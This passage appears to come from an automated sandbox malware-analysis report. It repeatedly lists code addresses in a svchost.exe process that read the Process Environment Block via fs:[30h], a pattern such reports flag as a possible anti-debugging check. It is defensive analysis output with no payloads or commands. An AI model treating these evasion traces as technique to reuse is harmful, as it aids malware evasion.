          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B0283 mov eax, dword ptr fs:[00000030h]19_2_035B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B0283 mov eax, dword ptr fs:[00000030h]19_2_035B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B0283 mov eax, dword ptr fs:[00000030h]19_2_035B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605283 mov eax, dword ptr fs:[00000030h]19_2_03605283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov eax, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov eax, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov ecx, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov ecx, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402A0 mov eax, dword ptr fs:[00000030h]19_2_035402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402A0 mov eax, dword ptr fs:[00000030h]19_2_035402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov ecx, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C72A0 mov eax, dword ptr fs:[00000030h]19_2_035C72A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C72A0 mov eax, dword ptr fs:[00000030h]19_2_035C72A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537152 mov eax, dword ptr fs:[00000030h]19_2_03537152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352C156 mov eax, dword ptr fs:[00000030h]19_2_0352C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03536154 mov eax, dword ptr fs:[00000030h]19_2_03536154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03536154 mov eax, dword ptr fs:[00000030h]19_2_03536154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov ecx, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C9179 mov eax, dword ptr fs:[00000030h]19_2_035C9179
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605152 mov eax, dword ptr fs:[00000030h]19_2_03605152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov ecx, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov eax, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov eax, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov eax, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F0115 mov eax, dword ptr fs:[00000030h]19_2_035F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03531131 mov eax, dword ptr fs:[00000030h]19_2_03531131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03531131 mov eax, dword ptr fs:[00000030h]19_2_03531131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03560124 mov eax, dword ptr fs:[00000030h]19_2_03560124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036061E5 mov eax, dword ptr fs:[00000030h]19_2_036061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356D1D0 mov eax, dword ptr fs:[00000030h]19_2_0356D1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356D1D0 mov ecx, dword ptr fs:[00000030h]19_2_0356D1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]19_2_035AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]19_2_035AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]19_2_035AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]19_2_035AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]19_2_035AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F61C3 mov eax, dword ptr fs:[00000030h]19_2_035F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F61C3 mov eax, dword ptr fs:[00000030h]19_2_035F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036051CB mov eax, dword ptr fs:[00000030h]19_2_036051CB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035601F8 mov eax, dword ptr fs:[00000030h]19_2_035601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]19_2_035551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035351ED mov eax, dword ptr fs:[00000030h]19_2_035351ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]19_2_035B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]19_2_035B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]19_2_035B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]19_2_035B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A197 mov eax, dword ptr fs:[00000030h]19_2_0352A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A197 mov eax, dword ptr fs:[00000030h]19_2_0352A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A197 mov eax, dword ptr fs:[00000030h]19_2_0352A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03587190 mov eax, dword ptr fs:[00000030h]19_2_03587190
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03570185 mov eax, dword ptr fs:[00000030h]19_2_03570185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EC188 mov eax, dword ptr fs:[00000030h]19_2_035EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EC188 mov eax, dword ptr fs:[00000030h]19_2_035EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354B1B0 mov eax, dword ptr fs:[00000030h]19_2_0354B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]19_2_035E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]19_2_035E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]19_2_035E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]19_2_035E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605060 mov eax, dword ptr fs:[00000030h]19_2_03605060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03532050 mov eax, dword ptr fs:[00000030h]19_2_03532050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035D705E mov ebx, dword ptr fs:[00000030h]19_2_035D705E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035D705E mov eax, dword ptr fs:[00000030h]19_2_035D705E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B052 mov eax, dword ptr fs:[00000030h]19_2_0355B052
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov ecx, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]19_2_03541070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355C073 mov eax, dword ptr fs:[00000030h]19_2_0355C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD070 mov ecx, dword ptr fs:[00000030h]19_2_035AD070
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]19_2_0354E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]19_2_0354E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]19_2_0354E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]19_2_0354E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]19_2_035F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]19_2_035F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]19_2_035F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]19_2_035F903E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A020 mov eax, dword ptr fs:[00000030h]19_2_0352A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352C020 mov eax, dword ptr fs:[00000030h]19_2_0352C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B20DE mov eax, dword ptr fs:[00000030h]19_2_035B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035590DB mov eax, dword ptr fs:[00000030h]19_2_035590DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]19_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD0C0 mov eax, dword ptr fs:[00000030h]19_2_035AD0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD0C0 mov eax, dword ptr fs:[00000030h]19_2_035AD0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352C0F0 mov eax, dword ptr fs:[00000030h]19_2_0352C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035720F0 mov ecx, dword ptr fs:[00000030h]19_2_035720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035550E4 mov eax, dword ptr fs:[00000030h]19_2_035550E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035550E4 mov ecx, dword ptr fs:[00000030h]19_2_035550E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]19_2_0352A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036050D9 mov eax, dword ptr fs:[00000030h]19_2_036050D9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035380E9 mov eax, dword ptr fs:[00000030h]19_2_035380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03535096 mov eax, dword ptr fs:[00000030h]19_2_03535096
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355D090 mov eax, dword ptr fs:[00000030h]19_2_0355D090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355D090 mov eax, dword ptr fs:[00000030h]19_2_0355D090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356909C mov eax, dword ptr fs:[00000030h]19_2_0356909C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353208A mov eax, dword ptr fs:[00000030h]19_2_0353208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D08D mov eax, dword ptr fs:[00000030h]19_2_0352D08D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F60B8 mov eax, dword ptr fs:[00000030h]19_2_035F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F60B8 mov ecx, dword ptr fs:[00000030h]19_2_035F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03530750 mov eax, dword ptr fs:[00000030h]19_2_03530750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572750 mov eax, dword ptr fs:[00000030h]19_2_03572750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572750 mov eax, dword ptr fs:[00000030h]19_2_03572750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B4755 mov eax, dword ptr fs:[00000030h]19_2_035B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03543740 mov eax, dword ptr fs:[00000030h]19_2_03543740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03543740 mov eax, dword ptr fs:[00000030h]19_2_03543740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03543740 mov eax, dword ptr fs:[00000030h]19_2_03543740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356674D mov esi, dword ptr fs:[00000030h]19_2_0356674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356674D mov eax, dword ptr fs:[00000030h]19_2_0356674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356674D mov eax, dword ptr fs:[00000030h]19_2_0356674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03538770 mov eax, dword ptr fs:[00000030h]19_2_03538770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]19_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03603749 mov eax, dword ptr fs:[00000030h]19_2_03603749
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]19_2_0352B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]19_2_0352B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]19_2_0352B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]19_2_0352B765
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03530710 mov eax, dword ptr fs:[00000030h]19_2_03530710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03560710 mov eax, dword ptr fs:[00000030h]19_2_03560710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356F71F mov eax, dword ptr fs:[00000030h]19_2_0356F71F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356F71F mov eax, dword ptr fs:[00000030h]19_2_0356F71F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537703 mov eax, dword ptr fs:[00000030h]19_2_03537703
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03535702 mov eax, dword ptr fs:[00000030h]19_2_03535702
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03535702 mov eax, dword ptr fs:[00000030h]19_2_03535702
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356C700 mov eax, dword ptr fs:[00000030h]19_2_0356C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]19_2_0360B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]19_2_0360B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]19_2_0360B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]19_2_0360B73C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529730 mov eax, dword ptr fs:[00000030h]19_2_03529730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529730 mov eax, dword ptr fs:[00000030h]19_2_03529730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03565734 mov eax, dword ptr fs:[00000030h]19_2_03565734
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353973A mov eax, dword ptr fs:[00000030h]19_2_0353973A
